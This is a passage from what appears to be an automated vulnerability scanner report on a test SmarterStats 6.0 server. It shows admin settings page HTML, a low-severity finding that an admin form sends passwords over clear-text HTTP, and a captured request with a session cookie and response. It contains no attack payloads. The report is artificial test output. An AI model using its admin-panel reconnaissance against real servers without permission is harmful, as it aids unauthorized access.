                   <td id="ctl00_MPH_txtAdminConfirmPassword_Label" class="Indent Fixed">Confirm New Password </td><td id="ctl00_MPH_txtAdminConfirmPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminConfirmPassword_SettingText" type="password" id="ctl00_MPH_txtAdminConfirmPassword_SettingText" class="text" autocomplete="off" /></td>
               </tr>
           </table>
</span></div>
       

<div id='ctl00_MPH_AdministrativeEmailsTab' class='' style='display:none'>
           <span id="ctl00_MPH_AdministrativeEmailsTab">
<table id="ctl00_MPH_tblAdministraativeEmails" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtProblemsEmailAddress">
                   <td id="ctl00_MPH_txtProblemsEmailAddress_Label" class="Indent Fixed">Email Address</td><td id="ctl00_MPH_txtProblemsEmailAddress_Setting" class="Setting"><input name="ctl00$MPH$txtProblemsEmailAddress_SettingText" type="text" value="administrator@example.com" size="40" id="ctl00_MPH_txtProblemsEmailAddress_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_txtSmtpServer">
                   <td id="ctl00_MPH_txtSmtpServer_Label" class="Indent Fixed">SMTP Server</td><td id="ctl00_MPH_txtSmtpServer_Setting" class="Setting"><input name="ctl00$MPH$txtSmtpServer_SettingText" type="text" value="vulnerable.smarterstats.6.0.host" size="40" id="ctl00_MPH_txtSmtpServer_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_chkProblemEmailsEnabled">
                   <td id="ctl00_MPH_chkProblemEmailsEnabled_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkProblemEmailsEnabled_Setting" class="Setting"><input id="ctl00_MPH_chkProblemEmailsEnabled_SettingCheck" type="checkbox" name="ctl00$MPH$chkProblemEmailsEnabled_SettingCheck" /><label for="ctl00_MPH_chkProblemEmailsEnabled_SettingCheck">Enable email notifications</label></td>
               </tr>
           </table>
</span></div>
       

</div>
   

</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('admin/frmgeneralsettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

<script type="text/javascript">
function refresh() {
parent.document.location.reload(true);
}
</script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fAdmin\x2ffrmGeneralSettings\x2easpx?'); });
$('#ctl00_MPH_txtAdminOldPassword_SettingText').val('');
$('#ctl00_MPH_txtAdminNewPassword_SettingText').val('');
$('#ctl00_MPH_txtAdminConfirmPassword_SettingText').val('');
$(function() { SetTopTitle('General\x20Settings'); });
$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem3":"ctl00_MPH_WebSettingsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_AdministratorTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_AdministrativeEmailsTab"},"ClientCallbacks":{}}); });
modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"Username","vcID":"ctl00_MPH_txtAdminUsername_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
modules['vmMustMatch_txt']='Must match {0}';
$(function() {$vc({"lt":"Confirm New Password ","vcID":"ctl00_MPH_txtAdminConfirmPassword_SettingText","VMs":["vmMustMatch"],"VPs":{"vmRequired":false,"vmMustMatch":"New Password ","vmMustMatchField":"ctl00_MPH_txtAdminNewPassword_SettingText"}},false);});
modules['vmOptional_txt']='Value is optional';
modules['vmEmail_txt']='Must be an email address';
modules['vmRequiredIfChecked_txt']='Must have a value if enabled';
$(function() {$vc({"lt":"Email Address","vcID":"ctl00_MPH_txtProblemsEmailAddress_SettingText","VMs":["vmOptional","vmEmail","vmRequiredIfChecked"],"VPs":{"vmRequiredCheckbox":"ctl00_MPH_chkProblemEmailsEnabled_SettingCheck","vmRequired":false}},false);});
$(function() {$vc({"lt":"SMTP Server","vcID":"ctl00_MPH_txtSmtpServer_SettingText","VMs":["vmOptional","vmRequiredIfChecked"],"VPs":{"vmRequiredCheckbox":"ctl00_MPH_chkProblemEmailsEnabled_SettingCheck","vmRequired":false}},false);});
//]]>
</script>
</form>
</body>
</html>


4.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Admin/frmSite.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 21:16:56 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72921
Connection: Close



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Sites - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmSite.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTYwMDgwNjA1Nw8WBB4QX19fUmVzdWx0RmFpbHVyZQXqAVlvdSBoYXZlIHJlYWNoZWQgdGhlIG1heGltdW0gbnVtYmVyIG9mIHNpdGVzIHRoYXQgeW91ciBsaWNlbnNlIGFsbG93cy4gIFBsZWFzZSBjb250YWN0IDxhIGhyZWY9J2h0dHA6Ly93d3cuc21hcnRlcnRvb2xzLmNvbScgdGFyZ2V0PSdfbmV3Jz53d3cuc21hcnRlcnRvb2xzLmNvbTwvYT4gdG8gbGVhcm4gaG93IHRvIGluY3JlYXNlIHRoZSBudW1iZXIgb2Ygc2l0ZXMgeW91IGNhbiBydW4gY29uY3VycmVudGx5Lh4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYKAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8DaGQCBw9kFgJmD2QWAgIBD2QWAgIBDxYCHgRUZXh0BYwCPGRpdiBjbGFzcz0iVGlwVGV4dEZhaWx1cmUiPllvdSBoYXZlIHJlYWNoZWQgdGhlIG1heGltdW0gbnVtYmVyIG9mIHNpdGVzIHRoYXQgeW91ciBsaWNlbnNlIGFsbG93cy4gIFBsZWFzZSBjb250YWN0IDxhIGhyZWY9J2h0dHA6Ly93d3cuc21hcnRlcnRvb2xzLmNvbScgdGFyZ2V0PSdfbmV3Jz53d3cuc21hcnRlcnRvb2xzLmNvbTwvYT4gdG8gbGVhcm4gaG93IHRvIGluY3JlYXNlIHRoZSBudW1iZXIgb2Ygc2l0ZXMgeW91IGNhbiBydW4gY29uY3VycmVudGx5LjwvZGl2PmQCCA9kFgICAQ9kFgICAQ9kFgJmD2QWAgIBD2QWBgIEDxYCHwNoZAIGDxYCHwNoZAIHDxYCHwNoZAIJD2QWBAIBD2QWAgIDDxYCHwQFB01lc3NhZ2VkAgMPZBYCZg9kFgICBw9kFgwCAg9kFgYCAQ9kFgwCAg8PFgIeCl9fcmVhZE9ubHloZBYCAgEPZBYCAgIPDxYCHwQFATJkZAIDDw8WAh8FaGQWAgIBD2QWAmYPEGQPFgFmFgEQBQlsb2NhbGhvc3QFATFnZGQCBA9kFgICAQ9kFgJmDxBkEBUDB1N0YXJ0ZWQGUGF1c2VkCERpc2FibGVkFQMFc3RhcnQGcGF1c2VkCGRpc2FibGVkFCsDA2dnZ2RkAgUPZBYEZg8PFgYeCENzc0NsYXNzBQxJbmRlbnQgRml4ZWQfBAUPU21hcnRlckxvZyBQYXRoHgRfIVNCAgJkZAIBDw8WBB8GBQggU2V0dGluZx8HAgJkZAIGDw8WAh8FaGQWAgIBD2QWAmYPEGQQFVcoKEdNVC0xMjowMCkgSW50ZXJuYXRpb25hbCBEYXRlIExpbmUgV2VzdCAoR01ULTExOjAwKSBNaWR3YXkgSXNsYW5kLCBTYW1vYRIoR01ULTEwOjAwKSBIYXdhaWkSKEdNVC0wOTowMCkgQWxhc2thJChHTVQtMDg6MDApIFRpanVhbmEsIEJhamEgQ2FsaWZvcm5pYSYoR01ULTA4OjAwKSBQYWNpZmljIFRpbWUgKFVTICYgQ2FuYWRhKS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBOZXcnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpEyhHTVQtMDc6MDApIEFyaXpvbmEtKEdNVC0wNzowMCkgQ2hpaHVhaHVhLCBMYSBQYXosIE1hemF0bGFuIC0gT2xkGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbjUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE9sZCYoR01ULTA2OjAwKSBDZW50cmFsIFRpbWUgKFVTICYgQ2FuYWRhKTUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE5ldxsoR01ULTA2OjAwKSBDZW50cmFsIEFtZXJpY2EmKEdNVC0wNTowMCkgRWFzdGVybiBUaW1lIChVUyAmIENhbmFkYSkaKEdNVC0wNTowMCkgSW5kaWFuYSAoRWFzdCkrKEdNVC0wNTowMCkgQm9nb3RhLCBMaW1hLCBRdWl0bywgUmlvIEJyYW5jbxMoR01ULTA0OjMwKSBDYXJhY2FzEihHTVQtMDQ6MDApIE1hbmF1cyIoR01ULTA0OjAwKSBBdGxhbnRpYyBUaW1lIChDYW5hZGEpEihHTVQtMDQ6MDApIExhIFBhehQoR01ULTA0OjAwKSBTYW50aWFnbxgoR01ULTAzOjMwKSBOZXdmb3VuZGxhbmQkKEdNVC0wMzowMCkgQnVlbm9zIEFpcmVzLCBHZW9yZ2V0b3duFShHTVQtMDM6MDApIEdyZWVubGFuZBQoR01ULTAzOjAwKSBCcmFzaWxpYRYoR01ULTAzOjAwKSBNb250ZXZpZGVvGChHTVQtMDI6MDApIE1pZC1BdGxhbnRpYxIoR01ULTAxOjAwKSBBem9yZXMaKEdNVC0wMTowMCkgQ2FwZSBWZXJkZSBJcy4lKEdNVCkgQ2FzYWJsYW5jYSwgTW9ucm92aWEsIFJleWtqYXZpaz0oR01UKSBHcmVlbndpY2ggTWVhbiBUaW1lIDogRHVibGluLCBFZGluYnVyZ2gsIExpc2JvbiwgTG9uZG9uPShHTVQrMDE6MDApIEJlbGdyYWRlLCBCcmF0aXNsYXZhLCBCdWRhcGVzdCwgTGp1YmxqYW5hLCBQcmFndWUsKEdNVCswMTowMCkgU2FyYWpldm8sIFNrb3BqZSwgV2Fyc2F3LCBaYWdyZWIvKEdNVCswMTowMCkgQnJ1c3NlbHMsIENvcGVuaGFnZW4sIE1hZHJpZCwgUGFyaXM8KEdNVCswMTowMCkgQW1zdGVyZGFtLCBCZXJsaW4sIEJlcm4sIFJvbWUsIFN0b2NraG9sbSwgVmllbm5hHyhHTVQrMDE6MDApIFdlc3QgQ2VudHJhbCBBZnJpY2EnKEdNVCswMjowMCkgQXRoZW5zLCBCdWNoYXJlc3QsIElzdGFuYnVsEihHTVQrMDI6MDApIEJlaXJ1dBEoR01UKzAyOjAwKSBBbW1hbhUoR01UKzAyOjAwKSBKZXJ1c2FsZW0UKEdNVCswMjowMCkgV2luZGhvZWs5KEdNVCswMjowMCkgSGVsc2lua2ksIEt5aXYsIFJpZ2EsIFNvZmlhLCBUYWxsaW5uLCBWaWxuaXVzHChHTVQrMDI6MDApIEhhcmFyZSwgUHJldG9yaWERKEdNVCswMjowMCkgTWluc2sRKEdNVCswMjowMCkgQ2Fpcm8TKEdNVCswMzowMCkgTmFpcm9iaS0oR01UKzAzOjAwKSBNb3Njb3csIFN0LiBQZXRlcnNidXJnLCBWb2xnb2dyYWQaKEdNVCswMzowMCkgS3V3YWl0LCBSaXlhZGgTKEdNVCswMzow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IExvZyBGb3JtYXQcSUlTIC0gTkNTQSBDb21tb24gTG9nIEZvcm1hdBpBcGFjaGUgLSBDb21tb24gTG9nIEZvcm1hdCFBcGFjaGUgLSBOQ1NBIEV4dGVuZGVkIExvZyBGb3JtYXQbSVBsYW5ldCAtIENvbW1vbiBMb2cgRm9ybWF0GU90aGVyIC0gQ29tbW9uIExvZyBGb3JtYXQVCARhdXRvBVczQ2V4A0lJUwROQ1NBCUFwYWNoZUNMRgxBcGFjaGVOQ1NBRXgKSVBsYW5ldENMRgNDTEYUKwMIZ2dnZ2dnZ2dkZAICD2QWAgIBD2QWAmYPEGQQFSUMTmV2ZXIgRGVsZXRlFURlbGV0ZSBhZnRlciAxIG1vbnRocxVEZWxldGUgYWZ0ZXIgMiBtb250aHMVRGVsZXRlIGFmdGVyIDMgbW9udGhzFURlbGV0ZSBhZnRlciA0IG1vbnRocxVEZWxldGUgYWZ0ZXIgNSBtb250aHMVRGVsZXRlIGFmdGVyIDYgbW9udGhzFURlbGV0ZSBhZnRlciA3IG1vbnRocxVEZWxldGUgYWZ0ZXIgOCBtb250aHMVRGVsZXRlIGFmdGVyIDkgbW9udGhzFkRlbGV0ZSBhZnRlciAxMCBtb250aHMWRGVsZXRlIGFmdGVyIDExIG1vbnRocxZEZWxldGUgYWZ0ZXIgMTIgbW9udGhzFkRlbGV0ZSBhZnRlciAxMyBtb250aHMWRGVsZXRlIGFmdGVyIDE0IG1vbnRocxZEZWxldGUgYWZ0ZXIgMTUgbW9udGhzFkRlbGV0ZSBhZnRlciAxNiBtb250aHMWRGVsZXRlIGFmdGVyIDE3IG1vbnRocxZEZWxldGUgYWZ0ZXIgMTggbW9udGhzFkRlbGV0ZSBhZnRlciAxOSBtb250aHMWRGVsZXRlIGFmdGVyIDIwIG1vbnRocxZEZWxldGUgYWZ0ZXIgMjEgbW9udGhzFkRlbGV0ZSBhZnRlciAyMiBtb250aHMWRGVsZXRlIGFmdGVyIDIzIG1vbnRocxZEZWxldGUgYWZ0ZXIgMjQgbW9udGhzFkRlbGV0ZSBhZnRlciAyNSBtb250aHMWRGVsZXRlIGFmdGVyIDI2IG1vbnRocxZEZWxldGUgYWZ0ZXIgMjcgbW9udGhzFkRlbGV0ZSBhZnRlciAyOCBtb250aHMWRGVs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U3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAAIQE9wdGlvbnMB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAAApPcHRpb25zVGFiC2QFGWN0bDAwJE1QSCRncmRMb2dMb2NhdGlvbnMPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtOA8y2gsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZX